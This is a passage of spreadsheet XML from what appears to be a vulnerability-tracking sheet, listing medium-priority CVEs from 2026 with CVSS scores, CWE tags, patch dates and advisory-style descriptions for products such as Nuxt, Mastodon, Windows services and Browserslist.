          <t>Vulnerability in the PeopleSoft Enterprise FIN Lease Administration product of Oracle PeopleSoft (component: Lease Administration).   The supported version that is affected is 9.2. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where PeopleSoft Enterprise FIN Lease Administration executes to compromise PeopleSoft Enterprise FIN Lease Administration.  While the vulnerability is in PeopleSoft Enterprise FIN Lease Administration, attacks may significantly impact additional products (scope change).  Successful attacks of this vulnerability can result in  unauthorized creation, deletion or modification access to critical data or all PeopleSoft Enterprise FIN Lease Administration accessible data as well as  unauthorized access to critical data or complete access to all PeopleSoft Enterprise FIN Lease Administration accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality and Integrity impacts).  CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N).</t>
        </is>
      </c>
      <c r="M2752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71092</t>
        </is>
      </c>
    </row>
    <row r="2753">
      <c r="A2753" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71314</t>
        </is>
      </c>
      <c r="C2753" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2753" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2753" s="5" t="inlineStr"/>
      <c r="F2753" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2753" s="5" t="inlineStr"/>
      <c r="H2753" s="5" t="inlineStr"/>
      <c r="I2753" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2753" s="5" t="inlineStr"/>
      <c r="K2753" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-400, CWE-770, CWE-789</t>
        </is>
      </c>
      <c r="L2753" s="5" t="inlineStr">
        <is>
          <t>Nuxt is an open-source web development framework for Vue.js. From 3.1.0 until 3.21.10 and 4.5.1, an unauthenticated attacker can use a server island v-for prop, including vforToArray and , to trigger unbounded SSR memory allocation until MAX_VFOR_LENGTH = 100000 and crash the Nuxt process. This issue is fixed in 3.21.10 and 4.5.1.</t>
        </is>
      </c>
      <c r="M2753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71314</t>
        </is>
      </c>
    </row>
    <row r="2754">
      <c r="A2754" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71316</t>
        </is>
      </c>
      <c r="C2754" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2754" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2754" s="5" t="inlineStr"/>
      <c r="F2754" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2754" s="5" t="inlineStr"/>
      <c r="H2754" s="5" t="inlineStr"/>
      <c r="I2754" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2754" s="5" t="inlineStr"/>
      <c r="K2754" s="5" t="inlineStr">
        <is>
          <t>CWE-524, CWE-862</t>
        </is>
      </c>
      <c r="L2754" s="5" t="inlineStr">
        <is>
          <t>Nuxt is an open-source web development framework for Vue.js. From 4.4.0 until 4.5.1, runtime cache:nuxt:payload entries for /&lt;page&gt;/_payload.json can be returned before route middleware and page guards because import.meta.prerender is not enforced, disclosing another user's SSR data. This issue is fixed in 4.5.1.</t>
        </is>
      </c>
      <c r="M2754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71316</t>
        </is>
      </c>
    </row>
    <row r="2755">
      <c r="A2755" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71321</t>
        </is>
      </c>
      <c r="C2755" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2755" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2755" s="5" t="inlineStr"/>
      <c r="F2755" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2755" s="5" t="inlineStr"/>
      <c r="H2755" s="5" t="inlineStr"/>
      <c r="I2755" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2755" s="5" t="inlineStr"/>
      <c r="K2755" s="5" t="inlineStr">
        <is>
          <t>CWE-407, CWE-770</t>
        </is>
      </c>
      <c r="L2755" s="5" t="inlineStr">
        <is>
          <t>Nuxt is an open-source web development framework for Vue.js. From 3.1.0 until 3.21.10 and 4.5.1, the internal island renderer endpoint `/__nuxt_island/...` decodes and hashes attacker-controlled JSON body input with destr and ohash before validating the URL-resident hash. An unauthenticated `POST /__nuxt_island/_.json` with a large JSON body is fully read, parsed, hashed, and then rejected, which wastes CPU on Nitro single event loop and delays concurrent requests. No valid hash and no authentication are required. This issue is fixed in 3.21.10 and 4.5.1.</t>
        </is>
      </c>
      <c r="M2755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71321</t>
        </is>
      </c>
    </row>
    <row r="2756">
      <c r="A2756" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71330</t>
        </is>
      </c>
      <c r="C2756" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2756" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2756" s="5" t="inlineStr"/>
      <c r="F2756" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2756" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2756" s="5" t="inlineStr"/>
      <c r="I2756" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2756" s="5" t="inlineStr"/>
      <c r="K2756" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L2756" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t>
        </is>
      </c>
    </row>
    <row r="2757">
      <c r="A2757" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71360</t>
        </is>
      </c>
      <c r="C2757" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2757" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2757" s="5" t="inlineStr"/>
      <c r="F2757" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2757" s="5" t="inlineStr"/>
      <c r="H2757" s="5" t="inlineStr">
        <is>
          <t>adobe:c2pa, adobe:c2patool</t>
        </is>
      </c>
      <c r="I2757" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2757" s="5" t="inlineStr"/>
      <c r="K2757" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2757" s="5" t="inlineStr">
        <is>
          <t>CAI Content Credentials is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.</t>
        </is>
      </c>
      <c r="M2757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71360</t>
        </is>
      </c>
    </row>
    <row r="2758">
      <c r="A2758" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71488</t>
        </is>
      </c>
      <c r="C2758" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2758" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2758" s="5" t="inlineStr"/>
      <c r="F2758" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2758" s="5" t="inlineStr"/>
      <c r="H2758" s="5" t="inlineStr"/>
      <c r="I2758" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2758" s="5" t="inlineStr"/>
      <c r="K2758" s="5" t="inlineStr">
        <is>
          <t>CWE-1050, CWE-407</t>
        </is>
      </c>
      <c r="L2758" s="5" t="inlineStr">
        <is>
          <t>league/commonmark is a PHP library for parsing and rendering CommonMark Markdown. From 0.6.0 until 2.9.0, specially crafted Markdown lines can cause the parser to have quadratic time complexity when converting, because several parsing paths repeatedly rescan growing portions of a line to translate between character positions and byte positions, and the Autolink extension can also copy and validate the remaining line at every URL-like prefix, allowing an attacker who can submit Markdown for conversion to consume disproportionate CPU time with a comparatively small request. This issue is fixed in 2.9.0.</t>
        </is>
      </c>
      <c r="M2758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71488</t>
        </is>
      </c>
    </row>
    <row r="2759">
      <c r="A2759" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71626</t>
        </is>
      </c>
      <c r="C2759" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2759" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2759" s="5" t="inlineStr"/>
      <c r="F2759" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2759" s="5" t="inlineStr"/>
      <c r="H2759" s="5" t="inlineStr"/>
      <c r="I2759" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2759" s="5" t="inlineStr"/>
      <c r="K2759" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2759" s="5" t="inlineStr">
        <is>
          <t>An issue in Invoice Ninja v5.13.24 allows a remote attacker to obtain sensitive information via the StoreWebhookRequest.php, UpdateWebhookRequest.php, and WebhookSingle.php components</t>
        </is>
      </c>
      <c r="M2759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71626</t>
        </is>
      </c>
    </row>
    <row r="2760">
      <c r="A2760" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72871</t>
        </is>
      </c>
      <c r="C2760" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2760" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2760" s="5" t="inlineStr"/>
      <c r="F2760" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2760" s="5" t="inlineStr"/>
      <c r="H2760" s="5" t="inlineStr"/>
      <c r="I2760" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2760" s="5" t="inlineStr"/>
      <c r="K2760" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2760" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the unauthenticated /api/providers/github/setup route in apps/dokploy/pages/api/providers/github/setup.ts trusts gh_init organizationId and userId values from the state parameter and calls createGithub in packages/server/src/services/github.ts, allowing an attacker to insert a GitHub App provider containing client_secret, webhook_secret, and PEM private key material into another organization. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M2760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72871</t>
        </is>
      </c>
    </row>
    <row r="2761">
      <c r="A2761" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72914</t>
        </is>
      </c>
      <c r="C2761" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2761" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2761" s="5" t="inlineStr"/>
      <c r="F2761" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2761" s="5" t="inlineStr"/>
      <c r="H2761" s="5" t="inlineStr"/>
      <c r="I2761" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2761" s="5" t="inlineStr"/>
      <c r="K2761" s="5" t="inlineStr">
        <is>
          <t>CWE-405, CWE-770</t>
        </is>
      </c>
      <c r="L2761" s="5" t="inlineStr">
        <is>
          <t>Mastodon is a free, open-source social network server based on ActivityPub. Prior to 4.4.21, 4.5.14, 4.6.4, and 4.7.0-beta.1, the administrative statistics endpoints handled by Api::V1::Admin::MeasuresController and Api::V1::Admin::RetentionController checked authorization only after beginning expensive calculations. Anonymous callers could submit keys, start_at, and end_at parameters that caused long-running SQL queries in Admin::Metrics::Measure, Admin::Metrics::Retention, and Admin::Metrics::Dimension::BaseDimension, allowing repeated requests to exhaust server resources. This issue is fixed in versions 4.4.21, 4.5.14, 4.6.4, and 4.7.0-beta.1.</t>
        </is>
      </c>
      <c r="M2761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72914</t>
        </is>
      </c>
    </row>
    <row r="2762">
      <c r="A2762" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72915</t>
        </is>
      </c>
      <c r="C2762" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2762" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2762" s="5" t="inlineStr"/>
      <c r="F2762" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2762" s="5" t="inlineStr"/>
      <c r="H2762" s="5" t="inlineStr"/>
      <c r="I2762" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2762" s="5" t="inlineStr"/>
      <c r="K2762" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2762" s="5" t="inlineStr">
        <is>
          <t>Mastodon is a free, open-source social network server based on ActivityPub. From 4.6.0-beta.1 until 4.6.4 and 4.7.0-beta.1, any logged-in local user could use the show action in app/controllers/admin/collections_controller.rb to access personally identifying information about another local user in a collection because the controller used the general collection policy instead of the admin collection policy namespace. The exposed data included the other user's current email address and last-used IP address. This issue is fixed in versions 4.6.4 and 4.7.0-beta.1.</t>
        </is>
      </c>
      <c r="M2762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72915</t>
        </is>
      </c>
    </row>
    <row r="2763">
      <c r="A2763" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72923</t>
        </is>
      </c>
      <c r="C2763" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2763" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2763" s="5" t="inlineStr"/>
      <c r="F2763" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2763" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2763" s="5" t="inlineStr"/>
      <c r="I2763" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2763" s="5" t="inlineStr"/>
      <c r="K2763" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2763" s="5" t="inlineStr">
        <is>
          <t>In Microsoft.OpenApi.YamlReader from 2.0.0-preview.11 until 2.12.0 and from 3.0.0 until 3.10.0, and in Microsoft.OpenApi.Readers prior to 1.6.30, a small YAML OpenAPI document containing nested anchors and aliases can cause uncontrolled resource consumption when parsed through the public YAML reader APIs. YAML is parsed through SharpYaml, which represents aliases as shared nodes in a directed acyclic graph, so the parsed YAML graph stays small, but converting that graph to System.Text.Json.Nodes.JsonNode requires every alias to be materialized as an independent node because a JsonNode cannot be attached to multiple parents. Without a bound on that conversion work, a document with N nested anchors each referenced k times can require k^N materialized JSON nodes, leading to excessive memory allocation and process termination through out-of-memory conditions, a billion laughs style denial of service. The patched versions bound the YAML-to-JSON conversion by node count and nesting depth and report an OpenApiDiagnostic error instead of expanding without limit. This vulnerability is fixed in Microsoft.OpenApi.YamlReader 2.12.0 and 3.10.0, and Microsoft.OpenApi.Readers 1.6.30.</t>
        </is>
      </c>
      <c r="M2763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72923</t>
        </is>
      </c>
    </row>
    <row r="2764">
      <c r="A2764" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72928</t>
        </is>
      </c>
      <c r="C2764" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2764" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2764" s="5" t="inlineStr"/>
      <c r="F2764" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2764" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2764" s="5" t="inlineStr"/>
      <c r="I2764" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2764" s="5" t="inlineStr"/>
      <c r="K2764" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2764" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t>
        </is>
      </c>
    </row>
    <row r="2765">
      <c r="A2765" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72932</t>
        </is>
      </c>
      <c r="C2765" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2765" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2765" s="5" t="inlineStr"/>
      <c r="F2765" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2765" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2765" s="5" t="inlineStr"/>
      <c r="I2765" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2765" s="5" t="inlineStr"/>
      <c r="K2765" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L2765" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Message Queuing Queue Manager allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72932</t>
        </is>
      </c>
    </row>
    <row r="2766">
      <c r="A2766" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72943</t>
        </is>
      </c>
      <c r="C2766" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2766" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2766" s="5" t="inlineStr"/>
      <c r="F2766" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2766" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2766" s="5" t="inlineStr"/>
      <c r="I2766" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2766" s="5" t="inlineStr"/>
      <c r="K2766" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2766" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72943</t>
        </is>
      </c>
    </row>
    <row r="2767">
      <c r="A2767" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72949</t>
        </is>
      </c>
      <c r="C2767" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2767" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2767" s="5" t="inlineStr"/>
      <c r="F2767" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2767" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2767" s="5" t="inlineStr"/>
      <c r="I2767" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2767" s="5" t="inlineStr"/>
      <c r="K2767" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2767" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows SMB Server Network Transport Driver (srvnet.sys) allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72949</t>
        </is>
      </c>
    </row>
    <row r="2768">
      <c r="A2768" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72954</t>
        </is>
      </c>
      <c r="C2768" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2768" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2768" s="5" t="inlineStr"/>
      <c r="F2768" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2768" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2768" s="5" t="inlineStr"/>
      <c r="I2768" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2768" s="5" t="inlineStr"/>
      <c r="K2768" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2768" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72954</t>
        </is>
      </c>
    </row>
    <row r="2769">
      <c r="A2769" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72989</t>
        </is>
      </c>
      <c r="C2769" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2769" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2769" s="5" t="inlineStr"/>
      <c r="F2769" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2769" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2769" s="5" t="inlineStr"/>
      <c r="I2769" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2769" s="5" t="inlineStr"/>
      <c r="K2769" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L2769" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Failover Cluster allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72989</t>
        </is>
      </c>
    </row>
    <row r="2770">
      <c r="A2770" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73017</t>
        </is>
      </c>
      <c r="C2770" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2770" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2770" s="5" t="inlineStr"/>
      <c r="F2770" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2770" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H277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2770" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2770" s="5" t="inlineStr"/>
      <c r="K2770" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2770" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t>
        </is>
      </c>
    </row>
    <row r="2771">
      <c r="A2771" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73088</t>
        </is>
      </c>
      <c r="C2771" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2771" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2771" s="5" t="inlineStr"/>
      <c r="F2771" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2771" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2771" s="5" t="inlineStr"/>
      <c r="I2771" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2771" s="5" t="inlineStr"/>
      <c r="K2771" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-248</t>
        </is>
      </c>
      <c r="L2771" s="5" t="inlineStr">
        <is>
          <t>Browserslist is a configuration tool for sharing target browsers and Node.js versions between front-end tools. Prior to 4.28.7, normalizeStats() in node.js, reached unconditionally through getStat() and loadStat() on every browserslist() call, processes untrusted browserslist-stats.json, opts.stats, and CLI --stats data with an unguarded for...in loop and plain-object bracket access and assignment, allowing inherited Object.prototype keys including __proto__, toString, valueOf, constructor, hasOwnProperty, and isPrototypeOf to cause an uncaught TypeError or modify the prototype of the returned normalized object. This issue is fixed in version 4.28.7.</t>
        </is>
      </c>
      <c r="M2771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73088</t>
        </is>
      </c>
    </row>
    <row r="2772">
      <c r="A2772" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73089</t>
        </is>
      </c>
      <c r="C2772" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2772" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2772" s="5" t="inlineStr"/>
      <c r="F2772" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2772" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2772" s="5" t="inlineStr"/>
      <c r="I2772" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2772" s="5" t="inlineStr"/>
      <c r="K2772" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2772" s="5" t="inlineStr">
        <is>
          <t>Browserslist is a configuration tool for sharing target browsers and Node.js versions between front-end tools. Prior to 4.28.7, index.js retains every distinct `(queries, context)` result in cache and every parseQueries() AST in parseCache without a size cap, TTL, or eviction, allowing an attacker who can influence repeated browserslist() query values, including valid since `&lt;year&gt;-&lt;month&gt;-&lt;day&gt;` queries, to bypass the caller-controlled BROWSERSLIST_DISABLE_CACHE mitigation and cause linear memory growth followed by an out-of-memory process crash. This issue is fixed in version 4.28.7.</t>
        </is>
      </c>
      <c r="M2772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73089</t>
        </is>
      </c>
    </row>
    <row r="2773">
      <c r="A2773" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73246</t>
        </is>
      </c>
      <c r="C2773" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2773" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2773" s="5" t="inlineStr"/>
      <c r="F2773" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2773" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2773" s="5" t="inlineStr"/>
      <c r="I2773" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2773" s="5" t="inlineStr"/>
